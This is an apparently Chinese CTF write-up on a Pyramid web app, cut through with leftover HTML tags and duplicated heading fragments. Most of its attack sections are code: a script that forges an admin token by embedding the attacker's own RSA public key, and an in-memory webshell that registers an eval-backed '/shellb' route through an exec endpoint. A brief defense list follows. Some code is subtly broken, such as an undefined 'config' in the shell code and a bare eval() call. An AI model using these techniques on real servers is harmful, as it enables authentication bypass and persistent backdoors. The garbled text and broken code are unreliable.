Pyramid Web框架安全漏洞分析与利用：RS签名伪造与内存马注入<\/h1>

1. 漏洞背景分析<\/h2>
本文基于强网杯比赛中发现的Pyramid Web框架安全漏洞，主要涉及两个关键安全问题：<\/p>
RS加密签名伪造漏洞<\/li>
Pyramid框架下的内存马注入技术<\/li> <\/ol>
2. 系统架构与代码分析<\/h2>

2.1 主程序结构<\/h3>
主程序使用Pyramid框架构建，主要路由和视图如下：<\/p>
from<\/span> wsgiref.simple_server import<\/span> make_server
<\/span><\/span>from<\/span> pyramid.config import<\/span> Configurator
<\/span><\/span>from<\/span> pyramid.events import<\/span> NewResponse
<\/span><\/span>from<\/span> pyramid.response import<\/span> Response
<\/span><\/span>import<\/span> util
<\/span><\/span>
<\/span><\/span>users =<\/span> []
<\/span><\/span>super_user =<\/span> ["admin"<\/span>]
<\/span><\/span>default_alg =<\/span> "RS"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> register_api<\/span>(request):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        username =<\/span> request.<\/span>params['username'<\/span>]
<\/span><\/span>        if<\/span> username in<\/span> super_user:
<\/span><\/span>            return<\/span> Response("Not Allowed!"<\/span>)
<\/span><\/span>        password =<\/span> request.<\/span>params['password'<\/span>]
<\/span><\/span>    except<\/span>:
<\/span><\/span>        return<\/span> Response('Please Input username & password'<\/span>, status=<\/span>"500 Internal Server"<\/span>)
<\/span><\/span>    data =<\/span> {"username"<\/span>: username, "password"<\/span>: password}
<\/span><\/span>    users.<\/span>append(data)
<\/span><\/span>    token =<\/span> util.<\/span>data_encode(data, default_alg)
<\/span><\/span>    return<\/span> Response("Here is your token: "<\/span> +<\/span> token)
<\/span><\/span>
<\/span><\/span>def<\/span> register_front<\/span>(request):
<\/span><\/span>    return<\/span> Response(util.<\/span>read_html('register.html'<\/span>))
<\/span><\/span>
<\/span><\/span>def<\/span> front_test<\/span>(request):
<\/span><\/span>    eval()
<\/span><\/span>    return<\/span> Response(util.<\/span>read_html('test.html'<\/span>))
<\/span><\/span>
<\/span><\/span>def<\/span> system_test<\/span>(request):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        code =<\/span> request.<\/span>params['code'<\/span>]
<\/span><\/span>        token =<\/span> request.<\/span>params['token'<\/span>]
<\/span><\/span>        data =<\/span> util.<\/span>data_decode(token)
<\/span><\/span>        if<\/span> data:
<\/span><\/span>            username =<\/span> data['username'<\/span>]
<\/span><\/span>            print(username)
<\/span><\/span>            if<\/span> username in<\/span> super_user:
<\/span><\/span>                print("Welcome super_user!"<\/span>)
<\/span><\/span>            else<\/span>:
<\/span><\/span>                return<\/span> Response('Unauthorized'<\/span>, status=<\/span>"401 Unauthorized"<\/span>)
<\/span><\/span>        else<\/span>:
<\/span><\/span>            return<\/span> Response('Unauthorized'<\/span>, status=<\/span>"401 Unauthorized"<\/span>)
<\/span><\/span>    except<\/span>:
<\/span><\/span>        return<\/span> Response('Please Input code & token'<\/span>)
<\/span><\/span>    print(exec(code))
<\/span><\/span>    return<\/span> Response("Success!"<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    with<\/span> Configurator() as<\/span> config:
<\/span><\/span>        config.<\/span>add_route('register_front'<\/span>, '\/'<\/span>)
<\/span><\/span>        config.<\/span>add_route('register_api'<\/span>, '\/api\/register'<\/span>)
<\/span><\/span>        config.<\/span>add_route('system_test'<\/span>, '\/api\/test'<\/span>)
<\/span><\/span>        config.<\/span>add_route('front_test'<\/span>, '\/test'<\/span>)
<\/span><\/span>        config.<\/span>add_view(system_test, route_name=<\/span>'system_test'<\/span>)
<\/span><\/span>        config.<\/span>add_view(front_test, route_name=<\/span>'front_test'<\/span>)
<\/span><\/span>        config.<\/span>add_view(register_api, route_name=<\/span>'register_api'<\/span>)
<\/span><\/span>        config.<\/span>add_view(register_front, route_name=<\/span>'register_front'<\/span>)
<\/span><\/span>        app =<\/span> config.<\/span>make_wsgi_app()
<\/span><\/span>    server =<\/span> make_server('0.0.0.0'<\/span>, 6543<\/span>, app)
<\/span><\/span>    server.<\/span>serve_forever()
<\/span><\/span><\/code><\/pre>2.2 关键安全函数分析<\/h3>
util.py<\/code>中的加密签名相关函数：<\/p>
import<\/span> base64
<\/span><\/span>import<\/span> json
<\/span><\/span>import<\/span> uuid
<\/span><\/span>from<\/span> Crypto.PublicKey import<\/span> RSA
<\/span><\/span>from<\/span> Crypto.Signature import<\/span> pkcs1_15
<\/span><\/span>from<\/span> Crypto.Hash import<\/span> SHA256
<\/span><\/span>import<\/span> hashlib
<\/span><\/span>
<\/span><\/span>secret =<\/span> str(uuid.<\/span>uuid4())
<\/span><\/span>
<\/span><\/span>def<\/span> generate_keys<\/span>():
<\/span><\/span>    key =<\/span> RSA.<\/span>generate(2048<\/span>)
<\/span><\/span>    private_key =<\/span> key.<\/span>export_key()
<\/span><\/span>    public_key =<\/span> key.<\/span>publickey().<\/span>export_key()
<\/span><\/span>    return<\/span> private_key, public_key
<\/span><\/span>
<\/span><\/span>def<\/span> sign_data<\/span>(private_key, data):
<\/span><\/span>    rsakey =<\/span> RSA.<\/span>import_key(private_key)
<\/span><\/span>    data_str =<\/span> json.<\/span>dumps(data)
<\/span><\/span>    hash_obj =<\/span> SHA256.<\/span>new(data_str.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    signature =<\/span> pkcs1_15.<\/span>new(rsakey).<\/span>sign(hash_obj)
<\/span><\/span>    return<\/span> signature
<\/span><\/span>
<\/span><\/span>def<\/span> verify_signature<\/span>(secret, data, signature, alg):
<\/span><\/span>    if<\/span> alg ==<\/span> 'RS'<\/span>:
<\/span><\/span>        rsakey =<\/span> RSA.<\/span>import_key(secret)
<\/span><\/span>        data_str =<\/span> json.<\/span>dumps(data)
<\/span><\/span>        hash_obj =<\/span> SHA256.<\/span>new(data_str.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>        try<\/span>:
<\/span><\/span>            pkcs1_15.<\/span>new(rsakey).<\/span>verify(hash_obj, signature)
<\/span><\/span>            print("Signature is valid. Transmitted data:"<\/span>, data)
<\/span><\/span>            return<\/span> True<\/span>
<\/span><\/span>        except<\/span> (ValueError<\/span>, TypeError<\/span>):
<\/span><\/span>            print("Signature is invalid."<\/span>)
<\/span><\/span>            return<\/span> False<\/span>
<\/span><\/span>    elif<\/span> alg ==<\/span> 'HS'<\/span>:
<\/span><\/span>        hash_object =<\/span> hashlib.<\/span>sha256()
<\/span><\/span>        data_bytes =<\/span> (json.<\/span>dumps(data) +<\/span> secret.<\/span>decode()).<\/span>encode('utf-8'<\/span>)
<\/span><\/span>        print(data_bytes)
<\/span><\/span>        hash_object.<\/span>update(data_bytes)
<\/span><\/span>        hex_dig =<\/span> hash_object.<\/span>hexdigest()
<\/span><\/span>        if<\/span> hex_dig ==<\/span> signature.<\/span>decode():
<\/span><\/span>            return<\/span> True<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            return<\/span> False<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> data_encode<\/span>(data, alg):
<\/span><\/span>    if<\/span> alg not<\/span> in<\/span> ['HS'<\/span>, 'RS'<\/span>]:
<\/span><\/span>        raise<\/span> "Algorithm must be HS or RS!"<\/span>
<\/span><\/span>    else<\/span>:
<\/span><\/span>        private_key, public_key =<\/span> generate_keys()
<\/span><\/span>        if<\/span> alg ==<\/span> 'RS'<\/span>:
<\/span><\/span>            signature =<\/span> sign_data(private_key, data)
<\/span><\/span>            data_bytes =<\/span> json.<\/span>dumps(data).<\/span>encode('utf-8'<\/span>)
<\/span><\/span>            encoded_data1 =<\/span> base64.<\/span>b64encode(data_bytes)  # data<\/span>
<\/span><\/span>            encoded_data2 =<\/span> base64.<\/span>b64encode(signature)  # signature<\/span>
<\/span><\/span>            print(encoded_data2)
<\/span><\/span>            encoded_data3 =<\/span> base64.<\/span>b64encode(alg.<\/span>encode('utf-8'<\/span>))  # alg<\/span>
<\/span><\/span>            encoded_data4 =<\/span> base64.<\/span>b64encode(public_key)  # public_key<\/span>
<\/span><\/span>            encoded_data =<\/span> encoded_data1.<\/span>decode() +<\/span> '.'<\/span> +<\/span> encoded_data2.<\/span>decode() +<\/span> '.'<\/span> +<\/span> encoded_data3.<\/span>decode() +<\/span> '.'<\/span> +<\/span> encoded_data4.<\/span>decode()
<\/span><\/span>            print("The encoded data is: "<\/span>, encoded_data)
<\/span><\/span>            return<\/span> encoded_data
<\/span><\/span>        else<\/span>:
<\/span><\/span>            hash_object =<\/span> hashlib.<\/span>sha256()
<\/span><\/span>            data_bytes =<\/span> (json.<\/span>dumps(data) +<\/span> secret).<\/span>encode('utf-8'<\/span>)
<\/span><\/span>            inputdata =<\/span> json.<\/span>dumps(data).<\/span>encode('utf-8'<\/span>)
<\/span><\/span>            hash_object.<\/span>update(data_bytes)
<\/span><\/span>            hex_dig =<\/span> hash_object.<\/span>hexdigest()
<\/span><\/span>            signature =<\/span> base64.<\/span>b64encode(hex_dig.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>            encoded_data1 =<\/span> base64.<\/span>b64encode(inputdata)  # data<\/span>
<\/span><\/span>            encoded_data3 =<\/span> base64.<\/span>b64encode(alg.<\/span>encode('utf-8'<\/span>))  # alg<\/span>
<\/span><\/span>            encoded_data =<\/span> encoded_data1.<\/span>decode() +<\/span> '.'<\/span> +<\/span> signature.<\/span>decode() +<\/span> '.'<\/span> +<\/span> encoded_data3.<\/span>decode()
<\/span><\/span>            print("The encoded data is: "<\/span>, encoded_data)
<\/span><\/span>            return<\/span> encoded_data
<\/span><\/span>
<\/span><\/span>def<\/span> data_decode<\/span>(encode_data):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        all_data =<\/span> encode_data.<\/span>split('.'<\/span>)
<\/span><\/span>        sig_bytes =<\/span> all_data[1<\/span>].<\/span>replace(' '<\/span>, '+'<\/span>).<\/span>encode('utf-8'<\/span>)
<\/span><\/span>        print(sig_bytes)
<\/span><\/span>        data =<\/span> base64.<\/span>b64decode(all_data[0<\/span>].<\/span>replace(' '<\/span>, '+'<\/span>)).<\/span>decode('utf-8'<\/span>)
<\/span><\/span>        json_data =<\/span> json.<\/span>loads(data)
<\/span><\/span>        signature =<\/span> base64.<\/span>b64decode(sig_bytes)
<\/span><\/span>        alg =<\/span> base64.<\/span>b64decode(all_data[2<\/span>]).<\/span>decode('utf-8'<\/span>)
<\/span><\/span>        key =<\/span> secret
<\/span><\/span>        if<\/span> len(all_data) ==<\/span> 4<\/span>:
<\/span><\/span>            key_bytes =<\/span> all_data[3<\/span>].<\/span>replace(' '<\/span>, '+'<\/span>).<\/span>encode('utf-8'<\/span>)
<\/span><\/span>            key =<\/span> base64.<\/span>b64decode(key_bytes)  # bytes<\/span>
<\/span><\/span>        # 验证签名<\/span>
<\/span><\/span>        is_valid =<\/span> verify_signature(key, json_data, signature, alg)
<\/span><\/span>        if<\/span> is_valid:
<\/span><\/span>            return<\/span> json_data
<\/span><\/span>        else<\/span>:
<\/span><\/span>            return<\/span> False<\/span>
<\/span><\/span>    except<\/span>:
<\/span><\/span>        raise<\/span> "something error"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> read_html<\/span>(filname):
<\/span><\/span>    with<\/span> open('C:<\/span>\\<\/span>Users<\/span>\\<\/span>86150<\/span>\\<\/span>Desktop<\/span>\\<\/span>attachment<\/span>\\<\/span>src<\/span>\\<\/span>static<\/span>\\<\/span>'<\/span> +<\/span> filname, 'r'<\/span>, encoding=<\/span>'utf-8'<\/span>) as<\/span> file:
<\/span><\/span>        html_content =<\/span> file.<\/span>read()
<\/span><\/span>    return<\/span> html_content
<\/span><\/span><\/code><\/pre>3. RS签名伪造漏洞分析<\/h2>
3.1 漏洞原理<\/h3>
系统使用RSA算法进行签名验证，但存在以下问题：<\/p>

密钥生成是随机的：generate_keys()<\/code>每次调用都会生成新的密钥对<\/li>
公钥暴露在token中：token的第四个字段是公钥<\/li>
验证时使用token中的公钥进行验证<\/li>
<\/ol>
3.2 漏洞利用步骤<\/h3>

生成恶意密钥对<\/strong>：使用generate_keys()<\/code>生成自己的RSA密钥对<\/li>
构造admin用户数据<\/strong>：创建包含"username": "admin"<\/code>的JSON数据<\/li>
使用私钥签名<\/strong>：用生成的私钥对数据进行签名<\/li>
构造完整token<\/strong>：将数据、签名、算法标识和公钥base64编码后拼接<\/li>
<\/ol>
3.3 漏洞利用代码<\/h3>
import<\/span> util
<\/span><\/span>import<\/span> base64
<\/span><\/span>import<\/span> json
<\/span><\/span>import<\/span> uuid
<\/span><\/span>from<\/span> Crypto.PublicKey import<\/span> RSA
<\/span><\/span>from<\/span> Crypto.Signature import<\/span> pkcs1_15
<\/span><\/span>from<\/span> Crypto.Hash import<\/span> SHA256
<\/span><\/span>import<\/span> hashlib
<\/span><\/span>
<\/span><\/span>secret =<\/span> str(uuid.<\/span>uuid4())
<\/span><\/span>
<\/span><\/span>def<\/span> generate_keys<\/span>():
<\/span><\/span>    key =<\/span> RSA.<\/span>generate(2048<\/span>)
<\/span><\/span>    private_key =<\/span> key.<\/span>export_key()
<\/span><\/span>    public_key =<\/span> key.<\/span>publickey().<\/span>export_key()
<\/span><\/span>    return<\/span> private_key, public_key
<\/span><\/span>
<\/span><\/span>def<\/span> sign_data<\/span>(private_key, data):
<\/span><\/span>    rsakey =<\/span> RSA.<\/span>import_key(private_key)
<\/span><\/span>    data_str =<\/span> json.<\/span>dumps(data)
<\/span><\/span>    hash_obj =<\/span> SHA256.<\/span>new(data_str.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    signature =<\/span> pkcs1_15.<\/span>new(rsakey).<\/span>sign(hash_obj)
<\/span><\/span>    return<\/span> signature
<\/span><\/span>
<\/span><\/span>def<\/span> data_encode<\/span>(data, alg):
<\/span><\/span>    if<\/span> alg not<\/span> in<\/span> ['HS'<\/span>, 'RS'<\/span>]:
<\/span><\/span>        raise<\/span> "Algorithm must be HS or RS!"<\/span>
<\/span><\/span>    else<\/span>:
<\/span><\/span>        private_key, public_key =<\/span> generate_keys()
<\/span><\/span>        if<\/span> alg ==<\/span> 'RS'<\/span>:
<\/span><\/span>            signature =<\/span> sign_data(private_key, data)
<\/span><\/span>            data_bytes =<\/span> json.<\/span>dumps(data).<\/span>encode('utf-8'<\/span>)
<\/span><\/span>            encoded_data1 =<\/span> base64.<\/span>b64encode(data_bytes)  # data<\/span>
<\/span><\/span>            encoded_data2 =<\/span> base64.<\/span>b64encode(signature)  # signature<\/span>
<\/span><\/span>            encoded_data3 =<\/span> base64.<\/span>b64encode(alg.<\/span>encode('utf-8'<\/span>))  # alg<\/span>
<\/span><\/span>            encoded_data4 =<\/span> base64.<\/span>b64encode(public_key)  # public_key<\/span>
<\/span><\/span>            encoded_data =<\/span> encoded_data1.<\/span>decode() +<\/span> '.'<\/span> +<\/span> encoded_data2.<\/span>decode() +<\/span> '.'<\/span> +<\/span> encoded_data3.<\/span>decode() +<\/span> '.'<\/span> +<\/span> encoded_data4.<\/span>decode()
<\/span><\/span>            return<\/span> encoded_data
<\/span><\/span>        else<\/span>:
<\/span><\/span>            hash_object =<\/span> hashlib.<\/span>sha256()
<\/span><\/span>            data_bytes =<\/span> (json.<\/span>dumps(data) +<\/span> secret).<\/span>encode('utf-8'<\/span>)
<\/span><\/span>            inputdata =<\/span> json.<\/span>dumps(data).<\/span>encode('utf-8'<\/span>)
<\/span><\/span>            hash_object.<\/span>update(data_bytes)
<\/span><\/span>            hex_dig =<\/span> hash_object.<\/span>hexdigest()
<\/span><\/span>            signature =<\/span> base64.<\/span>b64encode(hex_dig.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>            encoded_data1 =<\/span> base64.<\/span>b64encode(inputdata)  # data<\/span>
<\/span><\/span>            encoded_data3 =<\/span> base64.<\/span>b64encode(alg.<\/span>encode('utf-8'<\/span>))  # alg<\/span>
<\/span><\/span>            encoded_data =<\/span> encoded_data1.<\/span>decode() +<\/span> '.'<\/span> +<\/span> signature.<\/span>decode() +<\/span> '.'<\/span> +<\/span> encoded_data3.<\/span>decode()
<\/span><\/span>            print("The encoded data is: "<\/span>, encoded_data)
<\/span><\/span>            return<\/span> encoded_data
<\/span><\/span>
<\/span><\/span>pri, pub =<\/span> generate_keys()
<\/span><\/span>data =<\/span> {"username"<\/span>: "admin"<\/span>, "password"<\/span>: "password"<\/span>}
<\/span><\/span>token =<\/span> data_encode(data, 'RS'<\/span>)
<\/span><\/span>print(token)
<\/span><\/span><\/code><\/pre>4. Pyramid框架内存马注入技术<\/h2>
4.1 技术背景<\/h3>
在获取admin权限后，可以通过\/api\/test<\/code>路由执行任意代码。但在不出网、无回显的情况下，需要注入内存马维持访问。<\/p>
4.2 Pyramid框架路由机制<\/h3>
Pyramid使用Configurator<\/code>类管理路由和视图：<\/p>
with<\/span> Configurator() as<\/span> config:
<\/span><\/span>    config.<\/span>add_route('register_front'<\/span>, '\/'<\/span>)
<\/span><\/span>    config.<\/span>add_view(register_front, route_name=<\/span>'register_front'<\/span>)
<\/span><\/span>    app =<\/span> config.<\/span>make_wsgi_app()
<\/span><\/span><\/code><\/pre>关键方法：<\/p>

add_route()<\/code>: 添加路由<\/li>
add_view()<\/code>: 添加视图函数<\/li>
commit()<\/code>: 提交配置更改<\/li>
<\/ul>
4.3 获取当前配置对象<\/h3>
通过栈帧回溯获取当前Configurator实例：<\/p>
def<\/span> waff<\/span>():
<\/span><\/span>    def<\/span> f<\/span>():
<\/span><\/span>        yield<\/span> g.<\/span>gi_frame.<\/span>f_back
<\/span><\/span>    g =<\/span> f()
<\/span><\/span>    frame =<\/span> next(g)
<\/span><\/span>    b =<\/span> frame.<\/span>f_back.<\/span>f_back.<\/span>f_globals
<\/span><\/span>    print(b)
<\/span><\/span>waff()
<\/span><\/span><\/code><\/pre>4.4 完整内存马注入代码<\/h3>
def<\/span> waff<\/span>():
<\/span><\/span>    def<\/span> f<\/span>():
<\/span><\/span>        yield<\/span> g.<\/span>gi_frame.<\/span>f_back
<\/span><\/span>    g =<\/span> f()
<\/span><\/span>    frame =<\/span> next(g)
<\/span><\/span>    b =<\/span> frame.<\/span>f_back.<\/span>f_back.<\/span>f_globals
<\/span><\/span>    
<\/span><\/span>    def<\/span> hello<\/span>(request):
<\/span><\/span>        code =<\/span> request.<\/span>params['code'<\/span>]
<\/span><\/span>        res =<\/span> eval(code)
<\/span><\/span>        return<\/span> Response(res)
<\/span><\/span>    
<\/span><\/span>    config.<\/span>add_route('shellb'<\/span>, '\/shellb'<\/span>)
<\/span><\/span>    config.<\/span>add_view(hello, route_name=<\/span>'shellb'<\/span>)
<\/span><\/span>    config.<\/span>commit()
<\/span><\/span>waff()
<\/span><\/span><\/code><\/pre>4.5 利用过程<\/h3>

使用伪造的admin token访问\/api\/test<\/code><\/li>
执行上述代码注入内存马<\/li>
通过\/shellb?code=<恶意代码><\/code>执行任意命令<\/li>
<\/ol>
5. 防御建议<\/h2>
5.1 防止RS签名伪造<\/h3>

使用固定密钥对，不要每次生成新密钥<\/li>
不要将公钥暴露在token中<\/li>
使用更安全的签名方案如HMAC<\/li>
<\/ol>
5.2 防止内存马注入<\/h3>

严格限制代码执行功能<\/li>
对动态添加的路由进行权限检查<\/li>
监控异常路由添加行为<\/li>
<\/ol>
6. 总结<\/h2>
本文详细分析了Pyramid Web框架中的两个安全漏洞：RS签名伪造和内存马注入。通过构造恶意RSA密钥对可以绕过身份验证，而利用Pyramid的路由机制可以在内存中植入后门。这些技术对于Web安全研究和防御具有重要参考价值。<\/p>
Pyramid Web框架安全漏洞分析与利用：RS签名伪造与内存马注入<\/h1>

2. 系统架构与代码分析<\/h2>

3. RS签名伪造漏洞分析<\/h2>

4. Pyramid框架内存马注入技术<\/h2>

4.1 技术背景<\/h3> 在获取admin权限后，可以通过\/api\/test<\/code>路由执行任意代码。但在不出网、无回显的情况下，需要注入内存马维持访问。<\/p>

5. 防御建议<\/h2>

4.1 技术背景<\/h3>
在获取admin权限后，可以通过`\/api\/test<\/code>路由执行任意代码。但在不出网、无回显的情况下，需要注入内存马维持访问。<\/p>`
